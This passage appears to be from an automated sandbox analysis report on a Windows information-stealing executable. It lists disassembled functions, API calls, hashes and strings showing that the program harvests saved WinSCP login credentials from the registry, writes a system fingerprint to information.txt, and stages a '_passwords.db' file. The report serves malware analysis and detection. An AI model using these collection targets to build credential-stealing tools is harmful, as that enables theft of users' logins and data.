                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset$CloseValuelstrcpy$EnumOpenlstrcatlstrlen$??3@_invalid_parameter_noinfo_noreturnwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: Login: $:22$Host: $HostName$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$k@$passwords.txt$#
                                                                                                                                                                                                                                                                                                  • API String ID: 3659326365-2564332296
                                                                                                                                                                                                                                                                                                  • Opcode ID: db978dd1d17637b8657636170a5939793f2c46e79f922b8388fc985c6b70aa0e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9d2ed302519055baedf3f01fb35ec56aa45f2f10d73b1c3b99b849dfdee8a1d1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db978dd1d17637b8657636170a5939793f2c46e79f922b8388fc985c6b70aa0e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D19371B002186BDB14ABA1DC9ABFF77B9AF44704F10041EF506B7281DBBC5985CBA9
                                                                                                                                                                                                                                                                                                  Function 00413510 Relevance: 49.8, APIs: 2, Strings: 26, Instructions: 776stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 2574 413510-413e47 call 4101c0 call 410340 call 410290 call 410230 call 401360 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410920 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411120 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410700 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410540 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 GetCurrentProcessId call 411cc0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4107c0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411200 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 411200 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4108e0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4108b0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4110a0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4109f0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410920 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410990 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410b30 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410be0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410ba0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410cb0 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410d30 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410fe0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410d80 call 4102e0 call 410290 call 410230 * 2 call 410d80 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410530 lstrlenA call 410530 call 4101c0 call 410200 * 4 call 413e50 call 410230 * 6
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410920: GetProcessHeap.KERNEL32(?,?,Version: ,0042150A,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 0041092D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410920: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 0041093B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410920: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 00410942
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410920: wsprintfA.USER32 ref: 00410971
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411120: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411120: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411120: RegCloseKey.ADVAPI32(?), ref: 004111D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411120: CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410700: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410700: memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410700: lstrcatA.KERNEL32(?,00000000,?,00000000,00000000,0000000E,?,?,?), ref: 0041076A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410700: lstrcatA.KERNEL32(?,0041FE21,?,00000000,00000000,0000000E,?,?,?), ref: 00410780
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410540: lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,Path: ,?,?,00421508,?,?,?,?,?,?,HWID: ,?,?,00421509), ref: 0041371F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411CC0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411CDD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411CC0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411CC0: CloseHandle.KERNEL32(00000000), ref: 00411CFB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: GetProcessHeap.KERNEL32 ref: 004107D4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004107E2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: GetProcessHeap.KERNEL32 ref: 004107F4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410802
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: RegCloseKey.ADVAPI32(?), ref: 00410840
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004107C0: RegCloseKey.ADVAPI32(?), ref: 00410893
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004110B3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004110BE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004110C9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: ReleaseDC.USER32(00000000,00000000), ref: 004110D4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004110E0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004110EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004110A0: wsprintfA.USER32 ref: 004110FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004109F0: GetKeyboardLayoutList.USER32(00000000,00000000,0042150A), ref: 00410A11
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004109F0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410A23
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004109F0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410A2D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004109F0: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004109F0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000,00000200,?,?,?), ref: 00410AB4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004109F0: LocalFree.KERNEL32(00000000), ref: 00410B18
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410990: GetProcessHeap.KERNEL32(?,?,00421509,?,?,?,?,?,?,AV: ,?,?,00421509,?,?,?), ref: 0041099D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410990: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004109AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410990: GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410990: wsprintfA.USER32 ref: 004109DC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410B30: GetProcessHeap.KERNEL32 ref: 00410B42
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410B50
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410B30: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410B30: RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410B30: RegCloseKey.ADVAPI32(?), ref: 00410B8E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BE0: GetLogicalProcessorInformationEx.KERNEL32(0000FFFF,00000000,?), ref: 00410C19
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BE0: GetLastError.KERNEL32 ref: 00410C1F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BE0: wsprintfA.USER32 ref: 00410C7B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BA0: GetSystemInfo.KERNEL32(?), ref: 00410BAA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410BA0: wsprintfA.USER32 ref: 00410BBE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410CB0: GetProcessHeap.KERNEL32(?,Windows: ,?,?,00421508,?,?,Work Dir: In memory,?,?,00421509,?,?,?,?,00000000), ref: 00410CC1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410CB0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 00410CCF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410CB0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410CB0: wsprintfA.USER32 ref: 00410D0F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE0: Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE0: Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE0: Process32Next.KERNEL32(00000000,00000128), ref: 0041107A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410FE0: CloseHandle.KERNEL32(00000000), ref: 00411085
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D80: RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D80: RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D80: wsprintfA.USER32 ref: 00410E89
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D80: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D80: RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410D80: lstrlenA.KERNEL32(?), ref: 00410EDC
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00421509,?,?,?,?,?,?,Install Date: ,?,?,00421509,?,?,00000000), ref: 00413D8B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Alloc$wsprintf$Open$Close$QueryValuelstrcatlstrcpy$lstrlen$CreateInfoInformationLocalNameProcess32$CapsCurrentDeviceHandleKeyboardLayoutListLocaleNextTime$CharComputerDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleObjectProcessorProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                                                                  • String ID: yA$ yA$AV: $Computer Name: $Cores: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 429884184-1563601650
                                                                                                                                                                                                                                                                                                  • Opcode ID: 293ce5a3809314d421eefb1b24723dfc3c42a13475ce16b577afd8fa32f4f1d3
                                                                                                                                                                                                                                                                                                  • Instruction ID: a189de7b01f339a385a03e3b66eada7a47a45b5f45c16819aff5fa1a06e03475
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 293ce5a3809314d421eefb1b24723dfc3c42a13475ce16b577afd8fa32f4f1d3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D125C3035012427591A76A359FF9FF5A5B8AD5F58B54048FB41B5E282CEBC0CC2A2EF
                                                                                                                                                                                                                                                                                                  Function 00407DD0 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 297memoryfilestringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,?,?,?,?,00000009,?,00420BBE,?,?,?,C:\ProgramData\,0042150A), ref: 00407E8D
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EAE
                                                                                                                                                                                                                                                                                                  • PathFileExistsA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 00407EC9
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 00407F01
                                                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00407F15
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00407F2C
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 00407F39
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407F50
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407F6B
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00407F77
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 00407F85
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00407F99
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00420AE3), ref: 00407FA1
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00407FBC
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,00000000), ref: 00408052
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040805C
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00408064
                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 0040806E
                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00408081
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004089FB), ref: 0040809C
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,_passwords.db), ref: 00407FC4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411D20: GetProcessHeap.KERNEL32 ref: 00411D72
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411D20: HeapAlloc.KERNEL32(00000000,00000000,000000FA), ref: 00411D80
